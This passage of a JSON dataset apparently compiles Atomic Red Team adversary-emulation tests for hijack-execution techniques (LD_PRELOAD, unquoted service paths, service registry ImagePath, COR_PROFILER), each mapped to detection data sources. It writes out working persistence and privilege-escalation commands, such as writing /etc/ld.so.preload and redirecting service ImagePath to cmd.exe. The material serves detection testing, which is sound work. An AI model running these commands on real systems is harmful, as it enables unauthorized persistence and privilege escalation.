"bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_to_shared_library})\n", + "prereq_command": "if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}\n" + } + ], + "executor": { + "command": "sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'\n", + "cleanup_command": "sudo sed -i 's##{path_to_shared_library}##' /etc/ld.so.preload\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shared Library Injection via LD_PRELOAD", + "auto_generated_guid": "bc219ff7-789f-4d51-9142-ecae3397deae", + "description": "This test injects a shared object library via 
the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_shared_library_source": { + "description": "Path to a shared library source code", + "type": "Path", + "default": "PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c" + }, + "path_to_shared_library": { + "description": "Path to a shared library object", + "type": "Path", + "default": "/tmp/T1574006.so" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_to_shared_library})\n", + "prereq_command": "if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}\n" + } + ], + "executor": { + "command": "LD_PRELOAD=#{path_to_shared_library} ls\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": 
"Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + 
"https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1574.009", + "command_list": [ + "copy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\Program Files\\windows_service.exe\"\ncopy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n" + ], + "commands": [ + { + "command": "copy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\Program Files\\windows_service.exe\"\ncopy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n", + "source": "atomics/T1574.009/T1574.009.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Path Interception by Unquoted Path" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.009", + "display_name": "Hijack Execution Flow: Path Interception by Unquoted Path", + "atomic_tests": [ + { + "name": "Execution of program.exe as service with unquoted service path", + "auto_generated_guid": "2770dea7-c50f-457b-84c4-c40a47460d9f", + "description": "When a service is created whose executable path contains spaces and isn\u2019t enclosed within quotes, leads to a vulnerability\nknown as Unquoted Service Path which allows a user to gain SYSTEM privileges.\nIn this case, if an executable program.exe in 
C:\\ exists, C:\\program.exe will be executed instead of test.exe in C:\\Program Files\\subfolder\\test.exe.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_executable": { + "description": "Path of the executable used for the service and as the hijacked program.exe", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe" + } + }, + "executor": { + "command": "copy #{service_executable} \"C:\\Program Files\\windows_service.exe\"\ncopy #{service_executable} \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n", + "cleanup_command": "sc stop \"Example Service\" >nul 2>&1\nsc delete \"Example Service\" >nul 2>&1\ndel \"C:\\Program Files\\windows_service.exe\" >nul 2>&1\ndel \"C:\\program.exe\" >nul 2>&1\ndel \"C:\\Time.log\" >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances 
of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.011", + "command_list": [ + "get-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\* |FL\nget-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\weakservicename |FL\n", + "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\calcservice\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"%windir%\\system32\\cmd.exe\"\n" + ], + "commands": [ + { + "command": "get-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\* |FL\nget-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\weakservicename |FL\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions Weakness" + }, + { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\calcservice\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions 
Weakness" + }, + { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions Weakness" + }, + { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"%windir%\\system32\\cmd.exe\"\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions Weakness" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.011", + "display_name": "Hijack Execution Flow: Services Registry Permissions Weakness", + "atomic_tests": [ + { + "name": "Service Registry Permissions Weakness", + "auto_generated_guid": "f7536d63-7fd4-466f-89da-7e48d550752a", + "description": "Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. 
eg.\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "weak_service_name": { + "description": "weak service check", + "type": "String", + "default": "weakservicename" + } + }, + "executor": { + "command": "get-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\* |FL\nget-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name} |FL\n", + "name": "powershell" + } + }, + { + "name": "Service ImagePath Change with reg.exe", + "auto_generated_guid": "f38e9eea-e1d7-4ba6-b716-584791963827", + "description": "Change Service registry ImagePath of a bengin service to a malicious file\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "weak_service_name": { + "description": "weak service name", + "type": "String", + "default": "calcservice" + }, + "weak_service_path": { + "description": "weak service path", + "type": "String", + "default": "%windir%\\system32\\win32calc.exe" + }, + "malicious_service_path": { + "description": "malicious service path", + "type": "String", + "default": "%windir%\\system32\\cmd.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The service must exist (#{weak_service_name})\n", + "prereq_command": "if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "sc.exe create #{weak_service_name} binpath= \"#{weak_service_path}\"\n" + } + ], + "executor": { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "cleanup_command": "sc.exe delete #{weak_service_name}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system 
components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A 
process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, 
+ { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands 
executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1574.012", + "command_list": [ + "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\\InprocServer32\" -Value #{file_name} -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 
HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\n", + "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\n", + "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = 'PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'\n$env:COR_PROFILER_PATH = 
'#{file_name}'\nPOWERSHELL -c 'Start-Sleep 1'\n" + ], + "commands": [ + { + "command": "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\\InprocServer32\" -Value #{file_name} -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "Write-Host \"Creating system environment variables\" 
-ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = 'PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'\n$env:COR_PROFILER_PATH 
= '#{file_name}'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.012", + "display_name": "Hijack Execution Flow: COR_PROFILER", + "atomic_tests": [ + { + "name": "User scope COR_PROFILER", + "auto_generated_guid": "9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a", + "description": "Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).\nThe unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.\nAdditionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.\nIf the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,\nthe notepad process will not execute with high integrity.\n\nReference: https://redcanary.com/blog/cor_profiler-for-persistence/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "unmanaged profiler DLL", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll" + }, + "clsid_guid": { + "description": "custom clsid guid", + "type": "String", + "default": "{09108e71-974c-4010-89cb-acf471ae9e2c}" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "#{file_name} must be present\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + } + ], + "executor": { + "command": "Write-Host \"Creating registry keys in 
